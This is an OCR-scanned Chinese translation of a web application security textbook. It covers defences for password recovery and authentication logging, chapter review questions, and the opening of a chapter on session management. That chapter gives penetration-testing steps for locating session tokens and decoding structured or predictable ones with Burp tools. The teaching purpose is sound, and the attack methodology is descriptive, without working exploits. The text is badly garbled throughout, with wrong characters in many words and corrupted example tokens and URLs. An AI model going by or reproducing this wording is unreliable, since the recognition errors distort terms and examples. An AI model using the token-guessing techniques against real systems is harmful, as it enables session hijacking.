6.4.7 ”防止 滥用 账 尸 恢复 功能 


口 当 用 户 遗 筷 密 码 时 ， 许 多 安全 性 至 天 重要 的 应 用 程序 (如 电子 银行 ) 通过 非常 规 方 式 完 
成 账户 恢复 : 用 户 必 须 给 呼叫 中 心 打 电话 并 回答 一 系列 安全 问题 ;新 证 书 或 重新 激活 代 
码 也 以 非 第 规 方式 (通过 传统 的 邮件 ) 送 往 用 户 注册 的 家 庭 住址 。 绝 大 多 数 应 用 程序 并 
不 需要 这 种 程度 的 安全 你 护 ， 只 需 使 用 目 动 恢复 功能 即 可 。 

口 精心 设计 的 密码 恢复 机 制 需 要 防止 账户 被 未 授权 方 攻 破 ， 避 人 免 给 合法 用 户 造成 任何 使 用 
中 呵 。 

口 绝对 不 要 使 用 密码 “暗示 ”之 类 的 特性 ， 因 为 攻击 者 可 利用 明显 的 上 暗示 回 账 户 发 动 攻击 。 

D 通过 电子 邮件 给 用 户 发 送 一 个 唯一 的 、 具 有 时 间 限 制 的 、 无 法 猜测 的 一 次 性 恢复 URL 十 
帮助 用 户 重 新 控制 账户 的 最 佳 目 动 化 解决 方案 。 这 封 电子 邮件 应 送 至 用 户 在 注册 阶段 提 
供 的 地 址 中 。 用 户 访问 该 URL 即 可 设置 新 密码 。 之 后 ， 应 用 程序 会 辐 用 户 送 出 为 一 封 电 
子 邮 件 ， 说 明和 密码 已 被 修改 。 为 防止 攻击 者 通过 不 断 请 求 密 码 重 新 激活 电子 邮件 而 四 用 
户 发 动 拒绝 服务 攻击 ， 在 证 书 得 到 修改 前 ， 用 户 原 有 证 书 应 保持 有 效 。 

口 为 进一步 防止 未 授权 访问 ， 应 用 程序 可 能 会 加 用 户 提出 一 个 次 要 质询 ， 用 户 必须 在 使 用 
密码 重 设 功能 前 完成 该 质询 。 设 计 质 询 时 应 小 心 谨慎 ， 确 保 不 会 引入 新 的 漏洞 。 

@ 应 用 程序 应 在 注册 阶段 规定 : 质询 应 对 每 一 名 用 户 提 出 同一 个 或 同一 组 问题 。 如 采用 
户 提供 自己 的 质询 ， 可 能 其 中 会 有 一 些 非常 另 于 受到 攻击 ， 这 也 使 攻击 者 能 够 通过 确 
定 那些 日 行 设 定 质询 的 用 户 枚 举 出 有 效 的 账户 。 

@ 质询 啊 应 必须 具有 足够 的 随机 性 ， 硝 保 攻 击 者 无 法 轻 多 猜测 出 来 。 例 如 ， 询 问 用 户 就 
该 的 小 学 名 称 就 优 于 询问 他 们 最 豆 欢 的 颜色 。 

@ 为 防止 蛮 力 攻击 ， 如 打 多 次 答 试 完成 质询 神 以 失败 告终 ， 应 临时 冻结 相关 账户 。 

@ 如 所 质询 没有 得 到 正确 啊 应 ， 应 用 程序 不 应 泄露 任何 相关 信息 ， 如 用 户 名 的 有 效 性 、 
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账户 冻结 等 。 

成 功 完成 质询 后 ， 应 继续 完成 上 文 描述 的 处 理 过 程 ， 即 向 用 户 注 册 的 电子 邮件 地 址 发 
送 一 封包 含 重 新 激活 URL 的 电子 邮件 。 无 论 在 什么 情况 下 ， 应 用 程序 和 都 不 得 透露 用 户 
遗 慰 的 密码 或 向 单 将 用 户 放 人 一 个 通过 验证 的 会 话 中 。 此 外 ， 最 好 不 要 和 直接 进入 密码 
重 设 功 能 ， 因 为 与 初始 密码 相 比 ， 攻 击 者 通 弟 更 容易 猜测 出 账户 恢复 质询 的 啊 应 ， 因 
此 应 用 程序 不 应 依赖 它 对 用 户 进行 验证 。 

















6.4.8 ” 日志、 监控 与 通知 


口 应 用 程序 应 在 日 志 中 记录 所 有 与 验证 有 关 的 事件 ， 包 括 登 录 、 退 出 、 密 人 码 修 改 、 密 人 码 重 
设 、 账 尸 浆 结 与 账户 恢复 。 应 在 适当 的 地 方 记录 所 有 失败 与 成 功 的 登录 和 尝试。 日志 中 应 
包含 一 切 相 关 细 方 (如 用 户 名 和 IP 地 址 ), 但 不 得 泄露 任何 安全 机 密 ( 如 密码 )。 应 用 程序 
应 为 日 志 提 供 强 有 力 的 保护 以 防止 未 授权 访问 ， 因 为 它们 是 信息 泄露 的 主要 源头 。 

口 应 用 程序 的 实时 警报 与 人 侵 防 御 功 能 应 对 验证 过 程 中 的 异 帝 事 件 进行 处 理 。 例 如 ， 该 功 
能 应 回应 用 程序 管理 员 通 报 所 有 歼 力 攻击 模式 ， 便 于 他 们 和 采取 适当 的 防御 与 攻击 措施 。 
口 应 以 非常 规 方式 回 用 户 通报 任何 重大 的 安全 事件 。 例 如 ， 用 户 修改 密码 后 ， 应 用 程序 应 

回 他 注册 的 电子 邮件 地 址 发 送 一 封 邮件 。 

D 应 以 非常 规 方式 回 用 户 通报 经 常 发 生 的 安全 事件 。 例 如 ， 用 户 成 功 登 录 后 ， 应 用 程序 应 
各 用 户 通 报 上 次 登录 的 时 间 与 来 源 IP/ 域 ， 以 及 从 那 以 后 进行 的 无 效 登 录 和 尝试 的 次 数 。 如 
采用 户 获悉 其 账户 正 遭 受 密码 猜测 攻击 ， 他 就 更 有 可 能 会 经 和 修 改 冤 码 ， 并 设置 一 个 安 
全 性 高 的 密码 。 





















































6.5 ”小结 


验证 功能 可 能 是 应 用 程序 受 攻击 面 中 的 首要 目标 。 并 无 特权 的 匿名 用 户 可 下 接 访 问 该 功能 ; 
如 果 攻 击 者 破坏 了 该 功能 , 就 可 以 访问 受到 保护 的 功能 和 敏感 数据 。 验 证 功能 是 应 用 程序 安全 防 
御 机 制 的 核心 ,也 是 防御 未 授权 访问 的 前 沿 阵 地 。 

现实 中 的 验证 机 制 存在 着 大 量 的 设计 与 执行 缺陷 。 使 用 系统 化 的 方法 尝试 各 种 攻击 途径 ， 即 
可 对 这 些 缺陷 发 起 全 面 有 效 的 攻击 。 许 多 时 候 , 攻击 目 标 显 而 易 见 ， 如 保密 性 不 强 的 密码 、 发 现 
用 户 名 的 方法 和 人 至 力 攻击 源 洞 。 妨 一 方面 ， 有 些 缺 陷 隐 藏 得 很 深 ， 需 要 对 复杂 的 登录 过 程 进 行 仔 
细 的 分 析 才 能 发 现 可 供 利 用 以 “ 禹 开 应 用 程序 大 门 ” 的 细微 逻辑 缺陷 。 

“四 处 查 探 ” 是 攻击 验证 功能 最 第 用 的 方法 。 除 主 登 录 表 单 外 ， 可 能 还 包括 注册 新 账户 、 修 
改 密码 、 记 住 密码 、 恢 复 遗 饼 的 密码 与 盆 站 其 他 用 户 等 功能 。 以 上 每 一 种 功能 痢 可 能 成 为 浴 在 缺 
陷 的 主要 来 源 , 在 一 项 功能 中 特意 避免 的 问题 往往 又 会 在 其 他 功能 中 重新 出 现 。 花 训 一 些 时 间 仔 
细 检 查 所 能 发 现 的 每 一 个 受 攻击 面 ， 应 用 程序 验证 机 制 的 安全 性 将 会 得 到 显 千 增强 。 
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6.6 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netwahh。 
(1) 在 测试 一 个 使 用 joe 和 pass 证 书 登 录 的 Web 应 用 程序 的 过 程 中 ， 在 登录 阶段 ， 在 拦截 代 
理 服务 天 上 看 到 一 个 要 求 访问 以 下 UREL 的 请 求 : 
http:/www.wahh-app.com/app?action=logimn&uname=]Joe&password=pass 
如 采 不 再 进行 其 他 探测 ， 可 以 确定 哪 3 种 漏洞 ? 
(2) 目 我 注册 功能 如 何 会 引入 用 户 名 枚 举 独 洞 ? 如 何 防 止 这 些 漏洞 ? 
(G3) 一 个 登录 机 制 由 以 下 步 又 组 成 : 
(a) 应 用 程序 要 求 用 户 提 交 用 户 名 和 密码 ; 
(b) 应 用 程序 要 求 用户 提 交 值 得 纪念 的 词 中 的 两 个 随机 选择 的 字母 。 
应 用 程序 为 何 要 求 用 户 分 两 个 阶段 提供 所 需 的 信息 ?如 果 不 这 样 做 ， 登 录 机 制 将 存在 什么 
缺陷 ? 
(4) 一 个 多 阶段 登录 机 制 要 求 用 户 首先 提交 用 户 名 ， 然 后 在 后 续 阶段 中 提交 其 他 信息 。 如 采 
用 户 提交 任何 无 效 的 数据 ， 立 即 返回 到 第 一 个 阶段 。 
这 种 机 制 存在 什么 缺点 ?如 何 修复 这 种 漏洞 ? 
(5) 应 用 程序 在 登录 功能 中 整合 了 反 钓 鱼 机 制 。 注 册 过 程 中 ， 每 名 用 户 从 应 用 程序 提供 的 大 
量 图 片 中 选择 一 幅 特 丈 的 图 乒 。 登 录 机 制 由 以 下 步骤 组 成 : 
(a) 用 户 输 入 其 用 户 名 和 出 生日 期 ; 
(b) 如 果 这 些 信息 无 误 ,， 应 用 程序 各 用 户 显示 他 们 选择 的 图 片 ， 如 采信 息 有 误 ， 随机 显示 
一 幅 图 片 ; 
(c) 用 户 核 实 应 用 程序 显示 的 图 片 ， 如 果 图 瞩 正 确 ， 输入 他 们 的 密码 。 
反 钓 鱼 机 制 的 作用 在 于 : 它 加 用户 确 认 ， 他们 使 用 的 是 真实 而 非 “克隆” 的 应 用 程序 ， 因 为 
只 有 真正 的 应 用 程序 才能 显示 正确 的 图 片 。 
反 钓 鱼 机 制 给 登录 功能 造成 什么 漏洞 ? 这 种 机 制 能 够 有 效 阻 止 钓鱼 攻击 吗 ? 
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绝 大 多 数 Web 应 用 程序 中 ,会话 管理 机 制 是 一 个 基本 的 安全 组 件 。 它 帮助 应 用 程序 从 

大 量 不 同 的 请 求 中 确认 特定 的 用 户 ， 并 处 理 它 收 集 的 关于 用 户 与 应 用 程序 交互 状态 的 
数据 。 会 话 管理 在 应 用 程序 执行 登录 功能 时 显得 特别 重要 ,因为 它 可 在 用 户 通 过 请 求 提 交 他 们 的 
证 书后 ， 持 续 向 应 用 程序 保证 任何 特定 用 户 吴 份 的 真实 性 。 

由 于 会 话 管理 机 制 所 发 挥 的 关键 作用 , 它们 成 为 针对 应 用 程序 的 恶意 攻击 的 主要 目标 。 如 来 
攻击 者 能 够 破坏 应 用 程序 的 会 话 管理 , 他 就 能 轻易 避 开 其 实施 的 验证 机 制 , 不 需要 用 户 证 书 即 可 
伪 疼 成 其 他 应 用 程序 用 户 。 如 果 攻 击 者 以 这 种 方式 攻破 一 个 管理 用 户 , 那么 他 就 能 够 控制 整个 应 
用 程序 。 

和 验证 机 制 一 样 ， 通 常会 话 管理 功能 中 也 存在 着 大 量 缺 陷 。 在 最 容易 遭受 攻击 的 情况 下 ， 
攻击 者 只 需 递 增 应 用 程序 向 他 们 发 布 的 令 脾 值 ， 就 可 以 转换 到 为 一 名 用 户 的 账户 。 在 这 种 情况 
下 ,任何 人 都 可 以 访问 应 用 程序 的 全 部 功能 。 为 一 方面 ， 如 来 应 用 程序 受到 严密 保护 ， 攻 击 者 
必须 付出 巨大 的 努力 ， 破 解 几 层 模 糊 处 理 并 实施 复杂 的 自动 攻击 ， 才 能 发 现 应 用 程序 中 存在 的 
细小 漏洞 。 

本 章 将 分 析 我 们 在 现实 世界 的 Web 应 用 程序 中 发 现 的 各 种 漏洞 ,详细 说 明 发 现 和 利用 这 些 漏 
洞 所 需 执行 的 实际 步 又 。 最 后 还 将 摘 述 应 用 程序 为 防止 这 些 攻击 所 应 采取 的 防御 措施 。 



























































© 错误 观点 “我 们 使 用 智能 卡 进行 验证 ， 没 有 智能 卡 攻 击 者 不 可 能 攻破 用 户 会 话 。” 
无 论 应 用 程序 的 验证 机 制 多 么 安全 稳定 ， 只 有 通过 会 话 用户 随 后 提出 的 请 求 才能 
的 会 话 


与 验证 机 制 建立 联系 。 如 果 应 用 程序 的 会 


的 验证 机 制 ， 危 及 用 户 的 安全 。 


管理 存在 缺陷， 攻击 者 仍然 能 够 避 开 可 靠 





7.1 状态 要 求 

从 本 质 上 讲 ，HTTP 协 议 没有 状态 。 它 基于 一 种 简单 的 请 求 -响应 模型 ， 其 中 每 对 消息 代表 一 
个 独立 的 事务 。 协 议 本 身 并 无 将 某 位 用 户 提出 的 各 种 请 求 联系 起 来 的 机 制 ， 并 将 它们 与 Web 服 务 
如 收 到 的 所 有 其 他 请 求 区 分 开 来 。 在 Web 发 展 的 早期 阶段 ， 并 没有 必要 建立 这 种 机 制 : 因为 Web 
站 点 公布 的 是 任何 人 都 可 以 查阅 的 静态 HTML 页 面 。 但 如 今 ， 情 况 已 经 发 生 了 巨大 变化 。 























7.1 状态 要 求 149 


绝 大 多 数 的 Web“ 站 点 ”实际 为 Web 应 用 程序 。 它 们 人 允许 用 户 注 册 与 登录 ; 帮助 用 户 购买 及 
销售 产品 。 它 们 能 够 在 用 户 下 次 访问 时 记 住 他 的 喜好 。 它们 可 根据 用 户 的 单 击 和 输入 ,通过 动态 
建立 的 内 容 提供 丰 定 、 多 媒体 形式 的 使 用 体验 。 为 执行 这 些 功能 ， 应 用 程序 就 需要 使 用 会 话 。 

支持 登录 是 会 话 在 应 用 程序 中 最 主要 的 用 途 。 输入 用 户 名 和 密码 后 ,可 以 用 输入 的 证 书 所 属 
的 用 户 吴 份 使 用 应 用 程序 , 直到 退出 会 话 或 由 于 会 话 处 于 非 活 动 状态 而 终止 。 用 户 不 希望 在 每 个 
应 用 程序 页 面 重复 输入 密码 。 因 此 , 一 旦 用 户 通 过 验证 ， 应 用 程序 就 会 为 他 建立 一 个 会 话 ， 把 所 
有 属于 这 个 会 话 的 请 求 当 做 该 用 户 提出 的 请 求 处 理 。 

不 具备 登录 功能 的 应 用 程序 通常 也 需要 使 用 会 话 。 许 多 出 售 商品 的 站 点 并 不 要 求 顾 客 建 立 账 
户 。 但 是 ,它们 允许 用 户 浏览 目录 、 往 购物 篮 中 添加 商品 、 提 供 交 货 信 息 并 进行 文 付 。 在 这 种 情 
形 下 ， 就 没有 必要 验证 用 户 的 号 份 : 应 用 程序 并 不 知道 或 关心 绝 大 多 数 用 户 的 号 份 。 但是, 为 了 
与 他 们 进行 交易 ， 应 用 程序 需要 知道 它 收 到 的 哪些 请 求 来 自 同一 名 用 户 。 

执行 会 话 最 简单、 最 常见 的 方法 就 是 回 每 名 用 户 发 布 一 个 唯一 的 会 话 令 脾 或 标识 符 。 用户 在 
随后 回应 用 程序 提出 的 每 一 个 请 求 中 提交 这 个 令 牌 , 帮助 应 用 程序 在 当前 请 求 与 前 面 提出 的 请 求 
之 间 建 立 关联 。 

在 大 多 数 情 况 下 ， 应 用 程序 使 用 HTTP cookie 作 为 在 服务 器 与 客户 端 间 传 送 这 些 会 话 令 牌 的 
传输 机 制 。 服 务 需 对 新 客户 端的 第 一 个 啊 应 中 包含 以 人 HTTP 消息 头 : 

Set-Cookie: ASP.NET SessionId=mza2ji454s04cwbgwb2ttj55 
客户 并 随后 提出 的 请 求 中 包含 如 下 消息 头 : 

Cookie: ASP.NET SessionId=mza2]jJ]1i454s04cwbgwb2ttj55 

这 种 标准 的 会 话 管理 机 制 非常 容易 受到 各 种 类 型 的 攻击 。 当 攻击 会 话机 制 时 ,攻击 者 的 主要 
目标 是 以 某 种 方式 支持 一 名 合法 用 户 的 会 话 ， 由 此 伪装 成 这 名 用 户 。 如 果 该 用 户 已 经 通过 应 用 程 
序 的 验证 , 攻击 者 就 可 以 访问 属于 这 名 用 户 的 私有 数据 , 或 者 以 他 的 身份 执行 未 授权 操作 。 如 果 
该 用 户 未 能 通过 验证 ， 攻 击 者 仍然 能 够 查看 用 户 在 会 话 过 程 中 提交 的 敏感 信息 。 

和 表面 示例 中 运行 ASPNET 的 Microsoft IIS 服 务 需 一 样 , 许多 商业 Web 服 务 闫 和 Web 应 用 程序 
平台 执行 它们 自己 的 基于 HTTP cookie 的 非 定制 会 话 管 理解 决 方案 。Web 应 用 程序 开发 者 可 使 用 
它们 提供 的 API 将 会 话 依 赖 功能 与 这 种 解决 方案 整合 起 来 。 

事实 证 明 ， 一 些 非 定制 会 话 管理 解决 方案 易于 受到 各 种 攻击 ， 导 致 用 户 的 会 话 被 攻破 (这 
一 问题 将 在 本 章 后 面 讨论 )。 此外, 一些 开发 者 发 现 , 他 们 需要 比 内 置 解 决 方案 所 提供 的 控制 更 加 
全 面 的 会 话 行为 控制 ， 或 者 希望 避免 基于 cookie 的 解决 方案 中 存在 的 一 些 固 有 漏洞 。 鉴 于 这 些 原 
因 , 安全 性 至 关 重 要 的 应 用 程序 ( 如 电子 银行 ) 通常 使 用 定制 或 并 非 基 于 cookie 的 会 话 管理 机 制 。 

会 话 管理 机 制 中 存在 的 漏洞 主要 分 为 两 类 : 

口 会 话 令 牌 生成 过 程 中 的 薄弱 环 市 ; 

口 在 整个 生命 周期 过 程 中 处 理会 话 令 牌 的 薄弱 环节 。 

我 们 将 分 别 分析 这 些 弱 点 ,描述 在 现实 世界 的 会 话 管 理 机 制 中 常见 的 各 种 漏洞 ,以 及 发 现 和 
利用 这 些 漏洞 的 实用 技巧 。 最 后 将 描述 应 用 程序 为 防止 这 些 攻击 所 应 采取 的 防御 措施 。 
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渗透 测试 步 又 


许多 应 用 程序 使 用 标准 的 cookie 机 制 传输 会 话 令 牌 ， 这 样 可 直接 确定 哪些 数据 包含 令 牌 。 








然而 ， 在 其 他 情况 下 ， 可 能 需要 进行 一 番 探 测 才能 找到 令 牌 。 

(1) 应 用 程序 浓 稼 使 用 几 个 不 同 的 数据 共同 表示 一 个 令 牌 , 包括 cookie、URL 参 数 和 隐藏 表 
单字 段 。 其 中 一 些 数据 可 用 于 在 不 同 的 后 端 组 件 中 维护 会 话 状 态 。 如 果 没 有 得 到 确认 , 不 要 想 
当然 地 认为 某 个 特殊 的 参数 就 是 会 话 令 牌 , 或 者 只 使 用 一 个 数据 追踪 会 话 。 

(2) 有 时 ,一些 数据 似乎 是 应 用 程序 的 会 话 令 牌 ， 其 实 并 非 如 此 。 具 体 来 说 ， 由 Web 服 务 
器 或 应 用 程序 平台 生成 的 标准 会 话 cookie 可 能 存在 ， 但 实际 并 不 被 应 用 程序 使 用 。 

(3) 用 户 通 过 验证 后 ， 观 察 浏览 器 收 到 哪些 新 数据 项 。 应 用 程序 通常 会 在 用 户 通 过 验证 后 
建立 新 的 会 话 令 牌 。 

(4) 为 确定 应 用 程序 到 底 使 用 哪些 数据 项 作为 令 牌 ， 找 到 一 个 确信 依赖 会 话 的 页 面 ( 如 某 
一 名 用 户 的 “用 户 资料 ”页 面 )， 并 回 它 提出 几 个 请 求 ， 系 统 性 地 删除 疑似 被 用 作 令 牌 的 数据 。 
如 末 删 除 肝 个 数据 后 ， 应 用 程序 不 再 返回 会 话 依 赖 页 面 ， 即 可 确定 该 数据 可 能 为 会 话 令 牌 。 
Burp Repeater 是 执行 这 类 测试 的 有 效 工 具 。 
































会 话 符 代 方案 


并 非 每 一 种 Web 应 用 程序 都 使 用 会 话 , 一 些 具备 验证 机 制 、 功 能 复杂 的 安全 性 至 关 重 要 的 应 
用 程序 选择 使 用 其 他 技术 管理 状态 。 和 常见 的 会 话 蔡 代 方 案 有 两 种 。 

口 HTTP 验证 。 使 用 各 种 基于 HTTP 验 证 技术 ( 基本 、 摘要 、NTLM 验 证 等 ) 的 应 用 程序 有 
时 避免 使 用 会 话 。 在 HTTP 验 证 中 ， 客 户 端 组 件 使 用 HTTP 消 息 头 通过 浏览 吉 直 接 与 验证 
机 制 交 互 ， Te 任何 单独 页 面 中 的 针对 特定 应 用 程序 的 代码 与 验证 机 制 交 
互 。 一 旦 用 户 在 浏览 器 对 话 框 中 输入 他 的 证 书 ， 浏览 器 将 会 在 随后 向 同一 服务 器 提出 的 
每 个 请 求 中 重复 提交 这 些 证 书 (或 重复 执行 任何 必要 的 握手 )。 这 种 做 法 等 同 于 应 用 程序 
使 用 基于 HTML 表 单 的 验证 , 并 在 每 个 应 用 程序 页 面 插入 一 个 登录 表单 , 要求 用 户 通过 他 
们 执行 的 每 一 项 操作 重复 验证 自己 的 身份 。 因 此 ， 如 果 使 用 基于 HTTP 的 验证 ， 应 用 程序 
可 以 不 必 使 用 会 话 ， 而 通过 多 个 请 求 重 复 确定 用 户 身 份 。 然 而 ， 基 于 因特网 的 应 用 程序 
很 少 使 用 HTTP 验 证 。 而 且 , 由 于 会 话机 制 发 展 完善 , 能 够 提供 其 他 用 途 非 常 广泛 的 功能 
Fa 几乎 所 有 的 Web 应 用 程序 都 采用 这 种 机 制 。 

会 话 状态 机 制 。 一 些 应 用 程序 并 不 发 布 会 话 令 牌 管理 用 户 与 应 用 程序 的 交互 状态 ， 而 是 
0 必要 数据 (一 般 保存 在 cookie 或 隐藏 表单 字段 中 )， 由 客户 端 管理 状态 。 实 际 上 ， 
这 种 机 制 以 类 似 于 ASPNET Viewstate 的 方式 使 用 无 会 话 状 态 。 为 保证 这 种 机 制 的 安全 ， 
必须 对 通过 客户 端 传送 的 数据 加 以 适当 保护 。 这 通常 要 求 建 立 一 个 包含 所 有 状态 信息 的 二 
进 制 巨 对 象 ， 并 使 用 一 种 公认 的 算法 对 这 些 数 据 进行 加 密 或 签名 。 还 必须 在 数据 中 包含 足 
够 的 上 下 文 ， 以 防止 攻击 者 将 在 应 用 程序 某 个 位 置 收集 到 的 状态 对 象 提 交 到 另 一 个 位 置 ， 
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造成 采种 意外 行为 。 应 用 程序 还 必须 在 对 象 的 数据 中 包含 一 个 终 目 时间， 执行 与 会 话 超时 
相同 的 功能 。 我 们 已 在 第 5$ 章 详细 介绍 过 通过 客户 端 传送 数据 的 各 种 安全 机 制 。 





渗透 测试 步 又 


(1) 如 果 应 用 程序 使 用 HTTP 验 证 , 它 可 能 并 不 执行 会 话 管理 机 制 。 使 用 前 面 描述 的 方法 分 





析 任 何 可 能 是 令 牌 的 数据 的 作用 。 
(2) 如 果 应 用 程序 使 用 无 会 话 状态 机 制 ,通过 客户 端 传 送 所 有 必要 数据 进行 状态 维护 ， 有 时 
我 们 可 能 很 难 检测 出 这 种 机 制 ， 但 如 果 发 现下 列 迹 象 ， 即 可 确定 应 用 程序 使 用 这 种 机 制 。 
口 问 客 户 端 发 布 的 可 能 令 牌 的 数据 相当 长 (如 100 B 或 超过 100 B )。 
口 应 用 程序 对 每 个 请 求 做 出 啊 应 ， 发 布 一 个 新 的 类 似 令 牌 的 数据 。 
口 数据 似乎 被 加 密 〈 因 此 无 法 辨别 其 结构 ) 或 包含 签名 ( 由 有 意义 的 结构 和 几 个 字 市 
的 无 意义 二 进 制 数 据 组 成 )。 
口 应 用 程序 拒绝 通过 多 个 请 求 提交 相同 数据 的 做 法 。 
(3) 如 果 相 关 证 据 明确 表明 应 用 程序 并 未 使 用 会 话 令 牌 管 理 状态 , 那么 本 曹 描 述 的 任何 攻 
击 都 不 可 能 达到 其 目的 。 因 此 ， 最 好 着 手 去 寻找 其 他 严重 的 漏洞 ， 如 访问 控制 不 完善 或 代码 
注入 。 
































7.2 会话 令 牌 生成 过 程 中 的 注 弱 环 市 
由 于 生成 令 牌 的 过 程 不 安全 , 攻击 者 能 够 确定 发 布 给 其 他 用 户 的 令 牌 , 致使 会 话 管理 机 制 易 
于 受到 攻击 。 





EY | 注解 许多 时 候 ， 应 用 程序 的 安全 取决 于 它 所 生成 的 令 牌 的 不 可 预测 性 ， 以 下 是 一 些 
示例 : 

口 发 送 到 用 户 注 册 的 电子 邮件 地 址 的 密码 恢复 令 牌 ; 

口 隐藏 表单 字段 中 用 于 防止 跨 站 点 请 求 伪 造 攻 击 (请 参阅 第 13 章 ) 的 令 牌 ; 

口 用 于 一 次 性 访问 受 保护 的 资源 的 令 牌 ; 


口 “ 记 住 我 ”功能 使 用 的 永久 令 牌 ; 

口 未 使 用 验证 的 购物 应 用 程序 的 消费 者 用 于 检索 现 有 订单 的 当前 状态 的 令 牌 。 

在 本 章 中 , 我们 主要 讨论 适用 于 上 述 所 有 情形 的 与 令 牌 生成 有 关 的 缺陷 。 实 际 上 ， 
由 于 当前 的 许多 应 用 程序 都 采用 成 熟 的 平台 机 制 来 生成 会 话 令 牌 ， 因 此 ， 往 往 会 在 这 
些 功 能 区 域 发 现 有 关 令 牌 生成 的 可 利用 缺陷 。 
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7.2.1 令 牌 有 一 定 含 》 


一 些 会 话 令 牌 通过 用 户 的 用 户 名 或 电子 邮件 地 址 转换 而 来 , 或 者 使 用 与 其 相关 的 其 他 信息 创 
建 。 这 些 信息 可 以 某 种 方式 进行 编码 或 模糊 处 理 ， 也 可 与 其 他 数据 结合 在 一 起 。 

例如 ， 初 看 起 来 ， 下 面 的 令 牌 由 一 长 串 随 机 字符 组 成 : 

757365723Q6461663b6170703Q61646Q696e3P646174653q30312ft31322f3131 

但 是 , 仔细 分 析 后 发 现 ,其 中 仅 包含 十 六 进 制 字符 。 猜 想 这 个 字符 串 可 能 是 一 个 经 过 十 六 进 
制 编码 的 ASCII 字 符 串 ， 我 们 使 用 解码 需 对 其 解码 ， 发 现 它 实际 是 : 

user=daf;app=admin;date=10/09/11 

攻击 者 可 以 利用 这 个 会 话 令 牌 的 含义 猜测 其 他 应 用 程序 用 户 的 当前 会 话 。 使 用 一 组 枚 举 出 
的 用 户 名 或 常见 用 户 名 ， 就 能 够 迅速 生成 大 量 可 能 有 效 的 令 牧 并 进行 测试 以 确定 它们 是 否 
有 效 。 

包含 有 含义 数据 的 令 牌 通常 表现 出 某 种 结构 。 也 就 是 说 ,它们 由 几 种 成 分 组 成 , 通常 以 分 隔 
符 隔 开 ,攻击 者 可 分 别提 取 并 分 析 这 些 成 分 ， 以 了 解 它们 的 功能 和 生成 方法 。 结 构 化 令 牌 的 组 成 
成 分 包括 以 下 几 项 。 

口 账户 用 户 名 。 

口 应 用 程序 用 来 区 分 账户 的 数字 标识 符 。 

口 用 户 姓 名 中 的 名 / 姓 。 

口 用 户 的 电子 邮件 地 址 。 

口 用 户 在 应 用 程序 中 所 属 的 组 或 扮演 的 角色 。 

口 日 期 /时 间 戳 。 

口 一 个 递增 或 可 预测 的 数字 。 

口 客户 端的 耻 地 址 。 

为 特意 对 其 内 容 进 行 模糊 处 理 ， 或 者 只 是 为 了 确保 二 进 制 数据 能 通过 HTTP 安 全 传输 ， 应 用 
程序 会 对 结构 化 令 牌 中 的 每 个 不 同 成 分 或 整个 令 牌 以 不 同方 式 进 行 编码 。 笛 用 的 编码 方案 包括 
XOR、Base64 和 使 用 ASCII 字 符 的 十 六 进 制 表示 法 ( 请 参阅 第 3 章 了 解 相关 内 容 )。 为 将 其 恢复 到 
原始 状态 ， 可 能 有 必要 对 结构 化 令 牌 的 每 一 个 成 分 使 用 各 种 不 同 的 解码 方法 。 






























































注解 ” 当 处 理 包 含 结 构 化 令 牌 的 请 求 时 ， 应 用 程序 可 能 不 会 处 理 令 牌 中 的 每 一 个 成 分 
或 每 个 成 分 中 的 所 有 数据 。 在 前 面 的 示例 中 ,应 用 程序 可 能 会 对 令 牌 进行 Base64 解 
码 ， 然 后 只 处 理 其 中 的 “用 户 ”(user ) 和 “日 期 (date ) 成 分 。 如 果 令 牌 中 包含 一 


个 二 进 制 巨 对 多， 那么 这 些 数据 中 的 大 部 分 为 填充 数据 ， 只 有 一 小 部 分 数据 与 服务 
器 在 令 牌 上 执行 的 确认 有 关 。 减 少 令 牌 中 确实 必需 的 成 分 的 数量 通常 可 显著 降低 令 
牌 的 复杂 程度 。 
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渗透 测试 步 又 


(1) 从 应 用 程序 中 获取 一 个 令 牌 ， 对 其 进行 系统 化 的 修改 ， 以 确定 整个 令 牌 是 否 有 效 ， 或 








者 令 脾 的 某 些 成 分 是 否 被 忽略 。 尝试 以 一 次 一 个 字 市 (或 者 一 次 一 个 位 ) 的 方式 更 改 令 牌 的 值 ， 
然后 重新 回应 用 程序 提交 修改 后 的 令 牌 , 看 应 用 程序 是 否 仍然 接受 这 个 令 牌 。 如 果 发 现 令 牌 中 
的 某 些 部 分 实际 上 并 无 作用 ， 可 以 将 它们 排除 在 深入 分 析 之 外 ， 以 减轻 工作 负担 。 可 以 使 用 
Burp Intruder 中 的 “char frobber” 有 效 载 傈 类 型 修改 令 牌 的 什 ， 每 次 修改 一 个 字符 ， 以 帮助 完 
成 此 任务 。 

(2) 在 不 同时 间 以 不 同 的 用 户 登 录 , 记录 服务 天 发 布 的 令 牌 。 如 采 应 用 程序 允许 目 我 注册 ， 
可 以 选择 上 自己 的 用 户 名 , 用 一 系列 存在 细微 差别 的 相似 用 户 名 登录 , 如 A、AA、AAA 、AAAA、 
AAAB、AAAC、AABA 等 。 如 果 其 他 与 某 一 名 用 户 有 关 的 数据 (如 电子 邮件 地 址 ) 在 登录 阶 
段 提 交 或 保存 在 用 户 资料 中 ， 对 其 进行 与 前 面 类 似 的 系统 化 修改 ， 并 记录 登录 后 收 到 的 令 牌 。 

(3) 对 令 牌 进行 分 析 ， 查 找 任何 与 用 户 名 和 其 他 用 户 可 控制 的 数据 有 关 的 内 容 。 

(4) 分 析 令 牌 ， 碍 找 任何 明显 的 编码 或 模糊 处 理 方案 。 如 果 用 户 名 包含 一 组 相同 的 字符 ， 
在 令 牌 中 寻找 可 能 使 用 XOR 模 糊 处 理 的 对 应 字符 序列 ;在 令 牌 中 寻找 仅 包 含 十 六 进 制 字符 的 字 
符 序 列 ， 它 表示 应 用 程序 可 能 对 ASCII 宇 符 串 进行 了 十 六 进 制 编 码 处 理 ， 或 者 披露 其 他 信息 。 
寻找 以 等 号 (= ) 结尾 的 字符 序列 或 仅 包 含 其 他 有 效 Base64 字 符 的 序列 , 如 a~z、A~Z、0~9、 
十 和 /。 

(5) 如 有 果 对 会 话 令 有 牌 样本 进行 逆 癌 工程 可 获得 任何 有 意义 的 结果 ， 看 看 是 否 拥 有 足够 的 信 
县 可 猜测 出 应 用 程序 最 近 回 其 他 用 户 发 布 的 令 牌 。 找 到 一 个 依赖 会 话 的 应 用 程序 页 面 ( 即 如 有 果 
不 使 用 有 效 会 话 访 问 ， 就 会 返回 错误 消息 或 指 癌 其 他 位 置 的 重 定 同 页 面 )， 通 过 Burp Intruder 
